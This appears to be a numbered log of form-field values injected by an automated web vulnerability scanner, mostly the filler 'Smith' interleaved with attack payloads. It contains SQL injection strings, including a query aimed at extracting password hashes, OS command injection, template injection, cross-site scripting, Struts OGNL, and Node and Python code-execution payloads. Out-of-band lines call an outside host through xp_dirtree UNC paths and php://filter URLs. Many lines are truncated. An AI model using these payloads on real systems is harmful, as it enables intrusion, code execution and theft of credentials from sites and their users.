1147 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(10
1148
1149
1150 Smith
1151 Smith
1152 Smith
1153 "& ping -n 25 127.0.0.1 &
1154 <#assign x=268409241 - 41672> ${x?string["0"]}
1155
1156 Smith
1157 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(10
1158 Smith -1 OR 1=1
1159
1160 <%= "#{268409241-77582}" %>
1161 Smith
1162
1163 "& ping -n 25 127.0.0.1 &
1164 #{28275*28275-(86666)}
1165 Smith
1166 Smith
1167
1168
1169 NSFTW
1170 <%= "#{268409241-27648}" %>
1171 Smith -1 OR 1=1
1172 '& ping -n 25 127.0.0.1 &
1173 Smith
1174 Smith
1175
1176 #{28275*28275-(4435)}
1177 '& ping -n 25 127.0.0.1 &
1178
1179 @(268409241-79336)
1180 NSFTW
1181 Smith
1182
1183 & ping -n 25 127.0.0.1 &
1184
1185 ns:netsparker056650=vuln
1186 @(268409241-59086)
1187 Smith
1188 & ping -n 25 127.0.0.1 &
1189 Smith -1 OR 1=1
1190 Smith ns:netsparker056650=vuln
1191 Smith
1192 '+NSFTW+'
1193 Smith -1 OR 1=1
1194 Smith
1195 Smith
1196
1197 Smith '
1198
1199 Smith
1200 & ping -n 1 127.0.0.1 &
1201
1202 {{ 268409241- 35072 }}
1203 '& SET /A 0xFFF9999-1911 &
1204 '+NSFTW+'
1205 & ping -n 1 127.0.0.1 &
1206 {{ 268409241- 39348 }}
1207 http://example.com/? ns: netsparker056650=vuln
1208 Smith
1209 Smith '& SET /A 0xFFF9999-93219 &
1210 Smith NS NO
1211 Smith
1212
1213
1214 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10
1215
1216 (268409241-1310)
1217 Smith http://example.com/? ns: netsparker056650=vuln
1218 ${28275*28275-(69652)}
1219 Smith
1220
1221
1222 & SET /A 0xFFF9999-22857 &
1223 & ping -n 30 127.0.0.1 &
1224 Smith AND 'NS='ss
1225 Smith ' OR 1=1 OR 'ns'='ns
1226 Smith & SET /A 0xFFF9999-44036 &
1227
1228 (268409241-74257)
1229 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10
1230 Smith
1231
1232 ns:netsparker056650=vuln
1233
1234 Smith
1235 Smith " OR 1=1 OR "ns"="ns
1236 Smith ns:netsparker056650=vuln
1237 Smith ${28275*28275-(19419)}
1238 {{ 268409241- 57928 }}
1239
1240 Smith
1241 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA
1242 Smith -1 OR 17-7=10
1243 & ping -n 30 127.0.0.1 &
1244 Smith
1245 SET /A 0xFFF9999-71338 &
1246 Smith SET /A 0xFFF9999-97783 &
1247
1248 ns:netsparker056650=vuln
1249
1250 Smith
1251
1252 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA
1253 {{ 268409241- 88886 }}
1254 #{28275*28275-(51979)}
1255 Smith OR X='ss
1256 Smith
1257 SET /A 0xFFF9999-3349
1258 Smith
1259 ping -n 25 127.0.0.1 &
1260 Smith ' OR 1=1 OR '1'='1
1261 Smith
1262
1263 Smith #{28275*28275-(98286)}
1264 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
1265 Smith ' OR 1=1 OR '1'='1
1266 Smith ns:netsparker056650=vuln
1267 Smith " OR 1=1 OR "1"="1
1268
1269 ping -n 1 127.0.0.1 &
1270 N3tSp4rK3R
1271
1272 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
1273
1274 Smith SET /A 0xFFF9999-29448
1275
1276 Smith " OR 1=1 OR "1"="1
1277 Smith
1278 ping -n 1 127.0.0.1 &
1279 Smith
1280 Smith 3
1281 N3tSp4rK3R
1282 Smith
1283 Smith
1284 Smith
1285 Smith
1286 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
1287 | SET /A 0xFFF9999-11267
1288
1289
1290 Smith
1291 ping -n 25 127.0.0.1 &
1292 Smith -1 OR 1=1
1293 Smith
1294
1295 Smith | SET /A 0xFFF9999-31207
1296
1297
1298 Smith
1299 Smith -1 OR 1=1
1300 Smith 3
1301 Smith
1302 ";expr 268409241 - 69804;"
1303 Smith -1 OR 1=1
1304 "&ping -w 25 127.0.0.1 &"
1305 Smith
1306 Smith
1307 Smith
1308 Smith
1309
1310 Smith -1 OR 1=1
1311
1312 Smith '
1313
1314 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
1315 Smith ";expr 268409241 - 31631;"
1316 N3tSp4rK3R
1317 "&ping -w 25 127.0.0.1 &"
1318
1319 Smith NS NO
1320
1321 Smith
1322 Smith 3
1323 Smith
1324 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||
1325
1326 Smith AND 'NS='ss
1327
1328
1329 Smith
1330 Smith N3tSp4rK3R
1331 '&ping -w 25 127.0.0.1 &'
1332
1333
1334 ';expr 268409241 - 7500;'
1335 Smith
1336
1337
1338 Smith ' OR 1=1 OR 'ns'='ns
1339
1340 Smith ';expr 268409241 - 3544;'
1341 Smith 3
1342
1343
1344 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
1345
1346
1347 Smith
1348
1349 Smith
1350 '&ping -w 1 127.0.0.1 &'
1351 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||
1352 Smith
1353
1354 Smith
1355 ;expr 268409241 - 65611;x
1356 Smith -1 OR 17-7=10
1357 NS09
1358
1359
1360 Smith
1361 Smith
1362 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
1363 Smith OR X='ss
1364 '&ping -w 1 127.0.0.1 &'
1365
1366 Smith ' OR 1=1 OR '1'='1
1367 Smith
1368 Smith ' OR 1=1 OR '1'='1
1369 Smith
1370 Smith ;expr 268409241 - 41221;x
1371
1372
1373
1374
1375 Smith " OR 1=1 OR "1"="1
1376
1377 Smith
1378 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%
1379 NS09
1380 expr 268409241 - 82866;
1381
1382 Smith " OR 1=1 OR "1"="1
1383 Smith
1384 Smith
1385
1386 Smith
1387 Smith expr 268409241 - 26357;
1388 '&ping -w 25 127.0.0.1 &'
1389 Smith
1390 Smith
1391
1392
1393 Smith " OR 1=1 OR "ns"="ns
1394
1395
1396 expr 268409241 - 42724
1397 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%
1398
1399
1400 Smith 3
1401 Smith
1402 Smith
1403 &ping -w 25 127.0.0.1 &
1404
1405
1406 Smith
1407 NS09
1408 Smith
1409
1410 Smith
1411 Smith
1412 Smith
1413 Smith 3
1414
1415 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
1416 Smith expr 268409241 - 16244
1417 Smith NS09
1418 Smith
1419 Smith
1420
1421 &ping -w 25 127.0.0.1 &
1422
1423
1424
1425 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(
1426 ping -w 25 127.0.0.1 &
1427
1428 Smith
1429 Smith
1430 Smith
1431 Smith
1432
1433 Smith
1434
1435 &thisdoesntexists;
1436
1437
1438
1439
1440 Smith
1441
1442 Smith
1443
1444 ping -w 25 127.0.0.1 &
1445 ping -w 1 127.0.0.1 &
1446
1447
1448 &thisdoesntexists;
1449
1450 Smith
1451 Smith 3
1452 ping -w 1 127.0.0.1 &
1453 Smith
1454
1455
1456 Smith
1457 Smith
1458 Smith
1459 Smith
1460 Smith |expr${IFS}268409241${IFS}-${IFS}22883
1461
1462 Smith
1463
1464
1465
1466 ping -w 30 127.0.0.1 &
1467 Smith
1468
1469
1470 Smith
1471 Smith
1472
1473
1474
1475 Smith
1476
1477 Smith
1478
1479 Smith
1480 Smith
1481
1482 Smith
1483 ping -w 30 127.0.0.1 &
1484 Smith
1485
1486 Smith
1487 Smith
1488
1489
1490 Smith
1491 Smith
1492
1493
1494 Smith
1495 ping -n 25 127.0.0.1
1496
1497 Smith
1498
1499
1500
1501
1502 Smith
1503
1504
1505 Smith
1506 Smith
1507 Smith
1508 Smith
1509 Smith
1510 Smith
1511
1512 Smith
1513 ping -n 25 127.0.0.1
1514
1515 Smith
1516 Smith
1517 Smith
1518 Smith
1519
1520
1521 Smith
1522 Smith
1523
1524 Smith
1525 Smith
1526 Smith
1527 sbrj_544nty6abqdmwybqhpkxybacnsrmbqplk6sai8.r87.me
1528
1529
1530 Smith
1531
1532
1533
1534 Smith
1535 Smith
1536 Smith
1537 {{268409241-30571}}
1538
1539 Smith
1540
1541 sbrj_544ntzbn9xqe9ife_j72lja1dblrvaitvvmbca.r87.me
1542 ping -n 1 127.0.0.1
1543
1544 Smith
1545
1546 Smith
1547 Smith
1548 //sbrj_544nt9hnk7xl6p6fsdp4momo7dyxhq2ibpktgc.r87.me
1549
1550 Smith
1551 Smith {{268409241-19535}}
1552 Smith
1553 ping -n 1 127.0.0.1
1554
1555 Smith
1556 Smith
1557 Smith
1558 //sbrj_544ntfonuozoouuroxv4sdfolzvmuddqwu4ba8.r87.me
1559
1560
1561
1562 =268409241-90272
1563 Smith
1564 Smith
1565 ping -w 25 127.0.0.1
1566 Smith
1567 http://r87.me/r/?id=sbrj_544nthvadnvc7y0qlpiefctkj_ffvnjclcwqry
1568
1569 Smith
1570 Smith =268409241-91334
1571 Smith
1572 http://r87.me/r/?id=sbrj_544ntnf0eu5nagdkw0oos1xb-6lnjxf_9jyxda
1573
1574 Smith
1575 ping -w 25 127.0.0.1
1576
1577 <%- 268409241-1849 %>
1578 |ping -n 25 127.0.0.1
1579
1580 Smith
1581 &thisdoesntexists;
1582 Smith
1583
1584
1585
1586 Smith
1587 Smith
1588 Smith <%- 268409241-52718 %>
1589 Smith &thisdoesntexists;
1590
1591 |ping -n 25 127.0.0.1
1592
1593 Smith
1594 Smith
1595 http://sbrj_544ntil15zhrxuljgantrp1t4deeh3sdy09el7.r87.me/p/
1596 <#assign x=268409241 - 78049> ${x?string["0"]}
1597 Smith
1598
1599
1600 http://sbrj_544ntfc5ch5p26rvnrmiu1gys4s5ifxweffa1l.r87.me/p/
1601
1602 Smith
1603 Smith
1604 php://filter//resource=http://sbrj_544nty1zqlrre6vgnefvbubeyj2gzmdebkswef.r87.me/p/
1605 Smith
1606 Smith
1607
1608
1609 Smith
1610 Smith <#assign x=268409241 - 40741> ${x?string["0"]}
1611
1612
1613 Smith
1614
1615
1616
1617 Smith
1618
1619 Smith
1620
1621 php://filter//resource=http://sbrj_544ntds2mk5t0cclh_factdmfdchgqfqrbmqzb.r87.me/p/
1622 Smith
1623 Smith
1624 Smith
1625 sbrj_544nty8wxhgl-uu1-w8atfsuioovp3xlk1kj2x.r87.me/p/
1626 Smith
1627
1628
1629 Smith
1630
1631 Smith
1632 <%= "#{268409241-18401}" %>
1633
1634 Smith
1635
1636 Smith
1637
1638 Smith
1639 Smith
1640 Smith
1641 Smith
1642 Smith <%= "#{268409241-57913}" %>
1643
1644 Smith
1645
1646
1647
1648 Smith
1649 sbrj_544ntxmyszop8jbigqor6l-w4isprpevxtseho.r87.me
1650 Smith
1651 @(268409241-86836)
1652
1653 Smith
1654 Smith
1655 Smith sbrj_544ntvozzjrva2z4pclpnmpd8fxqkkzbbe8kho.r87.me
1656 Smith
1657
1658 Smith @(268409241-19663)
1659
1660 Smith
1661
1662 Smith
1663
1664
1665 Smith
1666
1667 {{ 268409241- 22535 }}
1668 Smith
1669 Smith
1670
1671 http://sbrj_544ntnvpuuxpdb2nmokfontshs89nbpwiqjan3.r87.me/p/
1672
1673 //sbrj_544ntsfuhvkcqrjkzy07crwfwe6ecx5i0c-eik.r87.me
1674 Smith
1675 Smith
1676 Smith
1677 Smith
1678 Smith http://sbrj_544nt-siopmdu-qurc3fhtnzwqjwff0tksqwcj.r87.me/p/
1679
1680 Smith
1681 php://filter//resource=http://sbrj_544nt6pubzs3ae1ktt99bmqwdjco-s-vr36fqn.r87.me/p/
1682 (268409241-98674)
1683 Smith
1684 Smith
1685
1686 Smith //sbrj_544nte7zpww_ao0lld0fyg1ieoo1p9ny5c82h4.r87.me
1687 Smith {{ 268409241- 46060 }}
1688 Smith
1689
1690
1691 Smith
1692
1693
1694 http://r87.me/r/?id=sbrj_544nt6pv2tqgze6d1avyetgipckbjref2zhojg
1695 Smith (268409241-48009)
1696 Smith php://filter//resource=http://sbrj_544nt5mpxd8wv-b75xslfzeg9nkne1b0ubbfbb.r87.me/p/
1697
1698
1699 sbrj_544ntcglw3id4nd1zbfrd5jyilwlikvggimx1p.r87.me/p/
1700
1701 Smith
1702
1703 n3tsp4rke2
1704 Smith
1705 Smith sbrj_544ntztmdl2ym2zu_bg2-m7w0ob6l8ufpc4szn.r87.me/p/
1706 Smith
1707 Smith
1708 Smith http://r87.me/r/?id=sbrj_544nt43o4zdrjjzlb-myognjg6ijclc5euiymy
1709 {{ 268409241- 17344 }}
1710
1711
1712 Smith
1713
1714
1715 Smith
1716 Smith
1717
1718 Smith
1719
1720 Smith
1721
1722 Smith
1723
1724 %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007193%29%3C%2FscRipt%3E
1725 Smith
1726 Smith
1727 Smith {{ 268409241- 46455 }}
1728
1729
1730
1731 Smith
1732 %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007194%29%3C%2FscRipt%3E
1733
1734
1735 Smith
1736 Smith
1737 Smith
1738
1739 data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3MUI3KTwvc2NyaXB0Pg==
1740 Smith
1741
1742
1743
1744 Smith
1745
1746 data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3MUI4KTwvc2NyaXB0Pg==
1747
1748 Smith
1749
1750 Smith
1751 Smith
1752
1753 Smith
1754 Smith
1755 Smith
1756 Smith
1757
1758
1759 '" ns=netsparker(0x0071C0)
1760
1761 Smith
1762
1763
1764 Smith
1765
1766 Smith
1767 '" ns=netsparker(0x0071C1)
1768 Smith
1769
1770 Smith
1771
1772
1773 Smith
1774 Smith
1775 1 ns=netsparker(0x007258)
1776
1777 Smith
1778 Smith
1779
1780
1781 Smith
1782
1783 1 ns=netsparker(0x007259)
1784
1785 response.write(268409241-45460)'
1786 Smith
1787
1788 Smith
1789 Smith
1790
1791 //r87.com/n/n.css?0x007285
1792 response.write(268409241-18100)'
1793 Smith
1794 Smith
1795
1796
1797 Smith
1798
1799 Smith
1800
1801 Smith
1802
1803 Smith
1804 Smith
1805 Smith
1806 Smith
1807
1808
1809 //r87.com/n/n.css?0x007286
1810 Smith
1811
1812
1813 +response.write(268409241-79391)'
1814
1815 Smith
1816
1817 Smith
1818 Smith
1819 Smith
1820 Smith
1821
1822
1823 Smith
1824 //r87.com/n/j/?0x0073DA
1825 +response.write(268409241-28048)'
1826
1827 Smith
1828 Smith
1829
1830
1831 Smith
1832 Smith
1833 Smith
1834
1835 Smith
1836 Smith
1837
1838 //r87.com/n/j/?0x0073DB
1839 "+response.write(268409241-8502)+"
1840
1841 Smith
1842 Smith
1843 Smith
1844
1845 "+response.write(268409241-91340)+"
1846 Smith
1847
1848 Smith
1849
1850 <% response.write(268409241-36725) %>
1851
1852 Smith
1853 Smith
1854 Smith
1855 Smith
1856 Smith
1857 Smith
1858 <% response.write(268409241-67123) %>
1859 Smith
1860
1861 Smith
1862 Smith
1863
1864 Smith
1865 print(int)0xFFF9999-75611
1866
1867
1868
1869 Smith
1870 Smith
1871 Smith
1872 print(int)0xFFF9999-10544
1873
1874
1875 Smith
1876
1877
1878
1879 Smith
1880 Smith
1881 Smith
1882 Smith
1883 print(int)0xFFF9999-27778;
1884 Smith
1885 javascript:netsparker(0x00742A)
1886
1887 Smith
1888 +print(int)0xFFF9999-74391;//
1889
1890 Smith
1891
1892
1893
1894
1895
1896 +print(int)0xFFF9999-84893;//
1897 javascript:netsparker(0x00742B)
1898 Smith
1899 Smith
1900 '+print(int)0xFFF9999-98273+'
1901 Smith
1902 Smith
1903 Smith
1904
1905
1906 Smith
1907
1908
1909
1910 '+print(int)0xFFF9999-34075+'
1911 Smith
1912 %27
1913
1914 <%a style=x:expre/**/ssion(netsparker(0x00745A))>
1915
1916 Smith
1917 "+print(int)0xFFF9999-22056+"
1918
1919
1920 Smith %27
1921 Smith
1922 Smith
1923 Smith
1924 stYle=x:expre/**/ssion(netsparker(0x000009))
1925 'stYle='x:expre/**/ssion(netsparker(0x000009))
1926 / stYle=x:expre/**/ssion(netsparker(0x000009))
1927 ' netsparker(0x000009) '
1928 <%a style=x:expre/**/ssion(netsparker(0x000009))>
1929 ns:expr/**/ession(netsparker(0x000009))
1930 "stYle="x:expre/**/ssion(netsparker(0x000009))
1931
1932 " netsparker(0x000009)
1933 javascript:netsparker(0x000009)
1934 netsparker(0x000009)
1935 " netsparker(0x000009) "
1936
1937 ' netsparker(0x000009) '
1938 ' netsparker(0x000009)
1939
1940 "stYle=x:expre/**/ssion(netsparker(0x000009)) ns="
1941
1942 expression(netsparker(0x000009))
1943 "+print(int)0xFFF9999-26036+"
1944 n:expression(netsparker(0x000009))
1945 'stYle=x:expre/**/ssion(netsparker(0x000009)) ns='
1946 Smith
1947
1948 ;n:expression(netsparker(0x000009))/*
1949 //r87.com/n/j/
1950 " netsparker(0x000009) "
1951 Smith
1952 x'" onmouseover=netsparker(0x000009) x=
1953 Smith
1954 Smith
1955
1956 Smith
1957
1958 %20stYle=x:expre/**/ssion(netsparker(0x000009))%20
1959 Smith
1960
1961 Smith (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
1962
1963 'stYle='x:expre/**/ssion(netsparker(0x000009))%20
1964 "stYle="x:expre/**/ssion(netsparker(0x000009))%20
1965 Smith
1966
1967
1968 '%2Bnetsparker(0x000009)%2B'
1969 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
1970
1971 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
1972
1973 Smith
1974 '%2Bnetsparker(0x000009)
1975 '%20netsparker(0x000009) '
1976 Smith
1977 "%2Bnetsparker(0x000009)%2B"
1978 Smith
1979 Smith
1980 {php}print(int)0xFFF9999-98780;{/php}
1981
1982 "%2Bnetsparker(0x000009)
1983 %20netsparker(0x000009)
1984 javascript:netsparker(0x000009)
1985 ns:expr/**/ession(netsparker(0x000009))
1986 <%a%20style=x:expre/**/ssion(netsparker(0x000009))>
1987 Smith
1988
1989 Smith
1990
1991 "%20netsparker(0x000009) "
1992 Smith '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
1993
1994 '{${print(int)0xFFF9999-52300}}'
1995 Smith
1996 Smith
1997 Smith
1998
1999 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
2000
2001 Smith
2002 Smith
2003
2004
2005 Smith
2006 '{${print(int)0xFFF9999-99084}}'
2007 Smith
2008
2009
2010 Smith convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
2011 Smith
2012
2013 'stYle=x:expre/**/ssion(netsparker(0x000009))%20ns='%20
2014 Smith
2015
2016 expression(netsparker(0x000009))
2017 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
2018 n:expression(netsparker(0x000009))
2019 Smith
2020 "stYle=x:expre/**/ssion(netsparker(0x000009))%20ns="%20
2021 Smith
2022 [php]print(int)0xFFF9999-74844;[/php]
2023
2024 ;n:expression(netsparker(0x000009))/*
2025 Smith
2026
2027
2028 [php]print(int)0xFFF9999-92904;[/php]
2029
2030 Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
2031 Smith
2032
2033 Smith
2034 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
2035
2036 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_member
2037
2038 Smith
2039 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_member
2040 print localtime()*0+0xFFF9999-18833
2041 Smith -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
2042 Smith
2043
2044
2045 Smith
2046
2047 print localtime()*0+0xFFF9999-95763
2048
2049 Smith
2050
2051 "& ping -n 25 127.0.0.1 &
2052 Smith
2053 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
2054 Smith
2055 eval('print localtime()*0+0xFFF9999-52935')
2056
2057
2058
2059
2060 Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
2061 "& ping -n 1 127.0.0.1 &
2062
2063 "& ping -n 1 127.0.0.1 &
2064 eval('print localtime()*0+0xFFF9999-43881')
2065 Smith
2066 Smith
2067 Smith
2068 "& ping -n 30 127.0.0.1 &
2069 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
2070
2071 '+print localtime()*0+0xFFF9999-80824+'
2072
2073
2074 Smith
2075 "& ping -n 30 127.0.0.1 &
2076 Smith
2077 '+print localtime()*0+0xFFF9999-70772+'
2078 Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
2079 Smith
2080
2081 Smith
2082 Smith "& ping -n 25 127.0.0.1 &
2083
2084 "+print localtime()*0+0xFFF9999-4951+"
2085
2086 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
2087 Smith
2088
2089 Smith
2090 Smith
2091 '& ping -n 25 127.0.0.1 &
2092
2093 Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
2094 exec('xp_dirtree ''\\sbrj_544ntfl3rwbfdm8pkbbfo6d_pcuochvgsms'+'rhi.r87.me'+'\c$\a''')
2095 Smith
2096 Smith '& ping -n 25 127.0.0.1 &
2097
2098 arguments[1].end(require('child_process').execSync('expr 268409241 - 51669'))
2099
2100 Smith
2101 exec('xp_dirtree ''\\sbrj_544ntp7btye1ulp7cpgf23_jcm4prthmm9r'+'vt0.r87.me'+'\c$\a''')
2102 arguments[1].end(require('child_process').execSync('expr 268409241 - 55531'))
2103 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
2104 Smith
2105 Smith '& ping -n 1 127.0.0.1 &
2106 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password
2107 arguments[1].end(require('child_process').execSync('set /A 268409241 - 24468'))
2108
2109
2110
2111
2112 Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
2113 Smith '& ping -n 1 127.0.0.1 &
2114 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password
2115 Smith
2116
2117
2118 Smith
2119 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
2120 arguments[1].end(require('child_process').execSync('set /A 268409241 - 47190'))
2121 1;exec('xp_dirtree ''\\sbrj_544nt5b_dsqs3hrvmjrv49atgyyot3d6nkm'+'dok.r87.me'+'\c$\a''')--
2122
2123 Smith
2124 1;exec('xp_dirtree ''\\sbrj_544ntnwlbe0bclqsvyqqjnbzfemw5w-yjc8'+'qx8.r87.me'+'\c$\a''')--
2125 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-18267)}
2126 Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
2127
2128 & ping -n 25 127.0.0.1 &
2129 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-33347)}
2130 -1';exec('xp_dirtree ''\\sbrj_544ntetrqx9u0wfl-qonoemczv3iqeteavm'+'qre.r87.me'+'\c$\a''')--
2131 Smith
2132
2133 -1';exec('xp_dirtree ''\\sbrj_544nt7zjhxgb6pmdeyw5tgzpr2zlxozgm8o'+'8mo.r87.me'+'\c$\a''')--
2134 & ping -n 1 127.0.0.1 &
2135 p "#{0xFFF9999.to_i-`echo 50739`.to_i}"
2136 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
2137 Smith
2138 1) exec('xp_dirtree ''\\sbrj_544nt-wxkg6rwifegd_n4ieig6s-dutxyre'+'lu8.r87.me'+'\c$\a''')--
2139
2140 Smith
2141 & ping -n 1 127.0.0.1 &
2142 Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
2143 Smith
2144 Smith
2145 p "#{0xFFF9999.to_i-`echo 65584`.to_i}"
2146 1) exec('xp_dirtree ''\\sbrj_544ntqqgfzammwsahk50vd_g90ak490iruh'+'wcq.r87.me'+'\c$\a''')--
2147 Smith
2148
2149 NSFTW
2150
2151 Smith
2152 Smith & ping -n 25 127.0.0.1 &
2153 Smith
2154 1')exec('xp_dirtree ''\\sbrj_544ntwjq8ujandbaq4ih7yjzv35mia5j0w_'+'dyy.r87.me'+'\c$\a''')--
2155
2156 Smith
2157 Smith NSFTW
2158 __import__('os').popen(('expr 268409241 - {0}').format('84748')).read()
2159 Smith
2160 1')exec('xp_dirtree ''\\sbrj_544ntg6deh0kda9preq-eyvedevndoijrmg'+'xwi.r87.me'+'\c$\a''')--
2161 ping -n 25 127.0.0.1 &
2162 '+NSFTW+'
2163 1))exec('xp_dirtree ''\\sbrj_544ntiywnvkbnf4lfjj1si61ieebf7gkerw'+'guw.r87.me'+'\c$\a''')--
2164 Smith
2165 1))exec('xp_dirtree ''\\sbrj_544ntznoicvtjanozje6n-04j7ru2khhsw1'+'hzc.r87.me'+'\c$\a''')--
2166 ping -n 1 127.0.0.1 &
2167
2168
2169 Smith '+NSFTW+'
2170 1'))exec('xp_dirtree ''\\sbrj_544ntlemoh90gr83-nkqctuhz8uvaljdhbi'+'49g.r87.me'+'\c$\a''')--
2171 ping -n 1 127.0.0.1 &
2172
2173 1'))exec('xp_dirtree ''\\sbrj_544ntsdphqfyoxvq3e-klgfstmoq9r_oymf'+'lgq.r87.me'+'\c$\a''')--
2174 Smith
2175 syscolumns WHERE 2>3;exec('xp_dirtree ''\\sbrj_544ntdyov1z67nzazncfati6hdssblf8ejx'+'9ge.r87.me'+'\c
